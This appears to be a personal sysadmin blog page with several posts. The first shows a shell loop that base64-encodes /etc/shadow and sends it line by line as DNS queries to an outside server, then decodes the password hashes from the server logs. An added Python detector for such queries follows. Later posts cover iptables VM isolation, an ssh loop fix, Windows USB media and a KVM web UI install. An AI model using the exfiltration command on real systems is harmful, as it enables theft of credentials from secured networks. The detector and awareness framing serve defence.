Bitbull Tech Notes - home of free minds ...

Transport protected data out of highly secured zones via DNS requests

I often spend time in highly isolated and secured networks.
Companies spend a lot of money to protect their sensitive data.

But so far I often see that the restrictions are not tight enough.

While layer-7 inspection of HTTPS traffic has become standard, DNS filtering has not.

Getting data out of a secure zone via DNS requests is quite easy, so let's start with this example.

What you need to get it running:

  • A server within the secured zone to push some data out.
  • A server on the internet where you can read the DNS logs.

So let's push the data out of the secure zone:

# base64 -w63 keeps every encoded line within the 63-byte limit of a single DNS label;
# each line becomes the leftmost label of a query for a name under the attacker-controlled zone
cat /etc/shadow | base64 -w63 | while read line
do
   host -t A $line.debug2.org 1.2.3.4
done

This command encodes the Linux shadow file (the password hashes) with base64 and transfers it line by line to my DNS server listening at IP 1.2.3.4.

On the receiving side I can easily reconstruct the data:

[root@ns ~]# grep debug2.org /var/log/messages | tail -2
Oct 19 08:50:27 ns named[1017]: client 8.7.11.1#55075 (QUFtdnRibHUyL0d6LzoxNzc2MDowOjk5OTk5Ojc6OjoKX2Nocm9ueToqOjE3NzY.debug2.org): view default: query (cache) 'QUFtdnRibHUyL0d6LzoxNzc2MDowOjk5OTk5Ojc6OjoKX2Nocm9ueToqOjE3NzY.debug2.org/A/IN' denied
Oct 19 08:50:27 pan named[1017]: client 8.7.11.1#48274 (wOjA6OTk5OTk6Nzo6Ogo=.debug2.org): view default: query (cache) 'wOjA6OTk5OTk6Nzo6Ogo=.debug2.org/A/IN' denied

[root@pan ~]# grep debug2.org /var/log/messages | cut -d'(' -f2- | cut -d'.' -f1 | base64 -d
root:$6$QMXJFcGY$TkVB1fdrSBzM9nlhO...rsPIc3F.35TN2sloEuQofCFO4SSE9Z3/:17760:0:99999:7:::
[...]
_chrony:*:17760:0:99999:7:::

Sometimes the case of the characters gets converted to upper or lower case; in that case it is just as easy to do the same with base32 or uuencode.

This is not meant to be used against the law, but should help to raise awareness of security ... and its problems.

Thanks
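The defensive counterpart, as an added example that is not part of the original post: the log lines above show that the encoded labels land in the resolver's query log even though the query itself is denied, so the same logs can be scanned for what no human types as a hostname. The script below is added here and is not the author's code; it parses the named log format quoted above and flags queries whose leftmost label is very long, has high entropy, or contains base64 characters (+ / =), and it sums the flagged label bytes per client. The thresholds and the third, ordinary-looking sample line are assumptions constructed for the example.

```python
import math
import re
from collections import Counter, defaultdict

# Regex for the named query-log format shown in the post:
#   "... named[<pid>]: client <ip>#<port> (<qname>): view default: query (cache) '<qname>/A/IN' denied"
LOG_RE = re.compile(r"named\[\d+\]: client (?P<client>[\d.]+)#\d+ \((?P<qname>[^)]+)\)")

# Tuning knobs (assumptions for this example, not values from the post).
LONG_LABEL = 40                  # DNS allows 63 bytes per label; real hostnames are far shorter
HIGH_ENTROPY = 4.0               # bits per character; base64 of hash-like data scores around 5
NON_HOSTNAME_CHARS = set("+/=")  # part of the base64 alphabet, never part of a hostname label


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for the empty string)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def label_reasons(qname):
    """Return the reasons the leftmost label of qname looks like encoded payload ([] if none)."""
    label = qname.split(".")[0]
    reasons = []
    if len(label) >= LONG_LABEL:
        reasons.append("long-label")
    if set(label) & NON_HOSTNAME_CHARS:
        reasons.append("non-hostname-chars")
    if shannon_entropy(label) >= HIGH_ENTROPY:
        reasons.append("high-entropy")
    return reasons


def analyze(lines):
    """Parse named log lines and return (alerts, per_client).

    alerts:     one dict per suspicious query: {"client", "qname", "reasons"}
    per_client: client IP -> {"queries", "flagged", "label_bytes"} where label_bytes
                is the total size of flagged labels, i.e. the approximate payload volume.
    """
    alerts = []
    per_client = defaultdict(lambda: {"queries": 0, "flagged": 0, "label_bytes": 0})
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue  # not a query-log line
        client, qname = m.group("client"), m.group("qname")
        stats = per_client[client]
        stats["queries"] += 1
        reasons = label_reasons(qname)
        if reasons:
            stats["flagged"] += 1
            stats["label_bytes"] += len(qname.split(".")[0])
            alerts.append({"client": client, "qname": qname, "reasons": reasons})
    return alerts, dict(per_client)


# Constructed sample: the two lines quoted in the post plus one ordinary-looking query.
SAMPLE_LOG = [
    "Oct 19 08:50:27 ns named[1017]: client 8.7.11.1#55075 (QUFtdnRibHUyL0d6LzoxNzc2MDowOjk5OTk5Ojc6OjoKX2Nocm9ueToqOjE3NzY.debug2.org): view default: query (cache) 'QUFtdnRibHUyL0d6LzoxNzc2MDowOjk5OTk5Ojc6OjoKX2Nocm9ueToqOjE3NzY.debug2.org/A/IN' denied",
    "Oct 19 08:50:27 pan named[1017]: client 8.7.11.1#48274 (wOjA6OTk5OTk6Nzo6Ogo=.debug2.org): view default: query (cache) 'wOjA6OTk5OTk6Nzo6Ogo=.debug2.org/A/IN' denied",
    "Oct 19 08:51:02 ns named[1017]: client 10.0.0.9#40211 (www.debug2.org): view default: query (cache) 'www.debug2.org/A/IN' denied",
]

if __name__ == "__main__":
    found, clients = analyze(SAMPLE_LOG)
    for a in found:
        print(f"{a['client']}  {', '.join(a['reasons'])}  {a['qname']}")
    for ip, s in clients.items():
        print(f"{ip}: {s['queries']} queries, {s['flagged']} flagged, {s['label_bytes']} payload bytes")
```

The place to run this is the resolver the hosts in the secured zone are actually allowed to talk to: if the zone only permits queries to an internal resolver whose logs are watched, and blocks direct DNS to the internet, the long base64 labels are both prevented from reaching an outside server and visible in one place.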

Quick and dirty: isolate 10 VMs on a KVM host from accessing the network

PROD NET: 192.168.1.0/24

VM IP RANGE TO ISOLATE: 192.168.1.221-230

service iptables restart
# NOTE: bridged frames only traverse the FORWARD chain when br_netfilter is loaded and
# net.bridge.bridge-nf-call-iptables=1; otherwise the physdev rules below never match.
# last rule, reject all (-I inserts at the top, so this first command ends up as the last rule)
iptables -I FORWARD -m physdev --physdev-is-bridged -m iprange --src-range 192.168.1.221-192.168.1.230 --dst 192.168.0.0/16 -j REJECT

# accept from test net to dns/dhcp
iptables -I FORWARD -m physdev --physdev-is-bridged -m iprange --src-range 192.168.1.221-192.168.1.230 --dst 192.168.1.50/32 -j ACCEPT

# accept from test net to test net
iptables -I FORWARD -m physdev --physdev-is-bridged -m iprange --src-range 192.168.1.221-192.168.1.230 --dst-range 192.168.1.221-192.168.1.230 -j ACCEPT

# accept from NOT test net to test net
iptables -I FORWARD -m physdev --physdev-is-bridged -m iprange \! --src-range 192.168.1.221-192.168.1.230 --dst-range 192.168.1.221-192.168.1.230 -j ACCEPT

# enable conntracking
iptables -I FORWARD -m physdev --physdev-is-bridged -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT

echo "--- ISOLATED CLASSROOM FROM PROD NETWORK ... DONE"
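Because iptables -I inserts at the head of the chain, the script's first command ends up as the last rule and the REJECT is only reached after all the ACCEPT rules. The Python model below is an added example and not part of the original note: it reproduces the resulting FORWARD order with a minimal first-match evaluator and checks the intended policy against constructed sample packets. The physdev match is assumed to be satisfied for every packet (on a real host that additionally needs br_netfilter with net.bridge.bridge-nf-call-iptables=1). It also makes two things explicit that the comments do not: traffic from the VMs to addresses outside 192.168.0.0/16 (the internet) is still forwarded, and appending the same rules with -A in script order would put the REJECT first and break DNS for the VMs.

```python
from ipaddress import ip_address, ip_network

# Constructed model of the FORWARD chain the script above produces. Each `iptables -I`
# pushes its rule to the top, so the script's first command is the last rule here.
# Only the match types the script uses are modelled: src/dst ranges, a dst network and
# the conntrack state; the physdev bridge match is assumed to be satisfied for every packet.
TEST_RANGE = ("192.168.1.221", "192.168.1.230")
FORWARD = [
    {"ctstate": {"RELATED", "ESTABLISHED"}, "target": "ACCEPT"},                                  # conntracking
    {"src_range": TEST_RANGE, "src_negate": True, "dst_range": TEST_RANGE, "target": "ACCEPT"},  # NOT test -> test
    {"src_range": TEST_RANGE, "dst_range": TEST_RANGE, "target": "ACCEPT"},                      # test -> test
    {"src_range": TEST_RANGE, "dst_net": "192.168.1.50/32", "target": "ACCEPT"},                 # test -> dns/dhcp
    {"src_range": TEST_RANGE, "dst_net": "192.168.0.0/16", "target": "REJECT"},                  # last rule: reject
]


def in_range(ip, rng):
    """True if ip lies inside the inclusive address range rng = (low, high)."""
    lo, hi = (ip_address(x) for x in rng)
    return lo <= ip_address(ip) <= hi


def rule_matches(rule, pkt):
    """Evaluate one rule's matches against a packet dict {src, dst, ctstate (optional)}."""
    if "ctstate" in rule and pkt.get("ctstate", "NEW") not in rule["ctstate"]:
        return False
    if "src_range" in rule:
        hit = in_range(pkt["src"], rule["src_range"])
        if hit == rule.get("src_negate", False):  # `!` flips the sense of the match
            return False
    if "dst_range" in rule and not in_range(pkt["dst"], rule["dst_range"]):
        return False
    if "dst_net" in rule and ip_address(pkt["dst"]) not in ip_network(rule["dst_net"]):
        return False
    return True


def verdict(pkt, chain=FORWARD, policy="ACCEPT"):
    """First matching rule wins, as in netfilter; no match falls through to the chain policy."""
    for rule in chain:
        if rule_matches(rule, pkt):
            return rule["target"]
    return policy


# Constructed sample packets together with the verdict the isolation is meant to produce.
CASES = {
    "vm -> prod host":            ({"src": "192.168.1.225", "dst": "192.168.1.10"}, "REJECT"),
    "vm -> other 192.168 subnet": ({"src": "192.168.1.225", "dst": "192.168.7.4"}, "REJECT"),
    "vm -> dns/dhcp":             ({"src": "192.168.1.225", "dst": "192.168.1.50"}, "ACCEPT"),
    "vm -> vm":                   ({"src": "192.168.1.225", "dst": "192.168.1.229"}, "ACCEPT"),
    "prod -> vm":                 ({"src": "192.168.1.10", "dst": "192.168.1.229"}, "ACCEPT"),
    "prod -> vm, established":    ({"src": "192.168.1.10", "dst": "192.168.1.225", "ctstate": "ESTABLISHED"}, "ACCEPT"),
    "vm -> internet":             ({"src": "192.168.1.225", "dst": "203.0.113.5"}, "ACCEPT"),  # not blocked by this ruleset
}


def check_policy(chain=FORWARD):
    """Return {case name: (actual verdict, expected verdict)} for every sample packet."""
    return {name: (verdict(pkt, chain), expected) for name, (pkt, expected) in CASES.items()}


if __name__ == "__main__":
    for name, (got, want) in check_policy().items():
        print(f"{name:28s} {got:7s} {'ok' if got == want else 'MISMATCH'}")
    # The same rules appended with -A in script order: the REJECT comes first and DNS breaks.
    print("appended order, vm -> dns:", verdict(CASES["vm -> dns/dhcp"][0], list(reversed(FORWARD))))
```

If the VMs should be cut off from the internet as well, the REJECT needs a broader destination than 192.168.0.0/16; the model makes that gap visible before the rules reach a live host.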

 

Why SSH is breaking bash loops and how to get around it

ssh reads from its standard input, so inside a "while read" loop fed by a pipe it swallows the remaining input lines and the loop ends after the first iteration; ssh -n (stdin redirected from /dev/null) keeps it away from the loop's input.

[root@kvm2 bin]# seq 3 | while read i; do echo $i; done
1
2
3
[root@kvm2 bin]# seq 3 | while read i; do echo $i ; ssh kvm1 date ; done
1
Wed Sep 13 15:55:46 CEST 2017
[root@kvm2 bin]# for i in $(seq 3) ; do echo $i ; ssh kvm1 date ; done
1
Wed Sep 13 15:55:54 CEST 2017
2
Wed Sep 13 15:55:54 CEST 2017
3
Wed Sep 13 15:55:54 CEST 2017
[root@kvm2 bin]# for i in $(seq 3) ; do echo $i ; ssh -n kvm1 date ; done
1
Wed Sep 13 15:56:03 CEST 2017
2
Wed Sep 13 15:56:04 CEST 2017
3
Wed Sep 13 15:56:04 CEST 2017

Create Windows 7 USB boot media

Not as easy as with Linux, but also not that hard.

fdisk /dev/sdh    # create partition as shown below

fdisk -l /dev/sdh
   Device Boot      Start         End      Blocks   Id  System
    /dev/sdh1            2048     7864319     3931136    7  HPFS/NTFS/exFAT

mkfs.ntfs -f /dev/sdh1

dd if=/usr/lib/syslinux/bios/mbr.bin of=/dev/sdh   # write the boot code; use mbr.bin from the syslinux package

mkdir /tmp/iso /tmp/usb

mount SW_DVD5_Win_Pro_7_64BIT.ISO /tmp/iso/
mount /dev/sdh1 /tmp/usb/

cp -rv /tmp/iso/* /tmp/usb/

umount /tmp/iso
umount /tmp/usb

Install Kimchi and Ginger on CentOS7 KVM host

This is a nice web UI for single KVM virtualization hosts.

I tried a lot of UIs, but this is so far the best open-source KVM web UI that uses libvirt for management.
Why is libvirt important?
It keeps your host open to integrate with or migrate from/to other virtualization solutions; it is the one and only standard so far.
If you do not use libvirt, the alternative is to run your VMs with pure QEMU, which isn't really an alternative.
Proxmox uses pure QEMU commands with its own management solution, and this is the reason that no one has ever built a Proxmox management integration.
Good for the Proxmox business, bad for the community, so better go the libvirt way.

I am missing the integration of multiple KVM hosts, but hopefully this is not the last release of Kimchi!

Thanks to the Kimchi team for building this web UI!!!

CU

Chris

yum -y install epel-release deltarpm chrony wget   # the package is "chrony"; chronyd is its service
yum makecache
yum -y update
yum install libvirt-python libvirt libvirt-daemon-config-network qemu-kvm python-ethtool sos \
          python-ipaddr nfs-utils iscsi-initiator-utils pyparted python-libguestfs libguestfs-tools novnc \
          spice-html5 python-configobj python-magic python-paramiko python-pillow virt-top

systemctl enable chronyd
systemctl restart chronyd
# firefox https://github.com/kimchi-project/kimchi/releases/latest

yum -y install http://kimchi-project.github.io/gingerbase/downloads/latest/ginger-base.el7.centos.noarch.rpm \
          http://kimchi-project.github.io/ginger/downloads/latest/ginger.el7.centos.noarch.rpm \
          https://github.com/kimchi-project/wok/releases/download/2.5.0/wok-2.5.0-0.el7.centos.noarch.rpm \
          https://github.com/kimchi-project/kimchi/releases/download/2.5.0/kimchi-2.5.0-0.el7.centos.noarch.rpm

firewall-cmd --add-port 8001/tcp --permanent

systemctl enable wokd nginx
systemctl restart wokd nginx firewalld

Now you can reach the KVM virt UI at:

https://kvm-host:8001
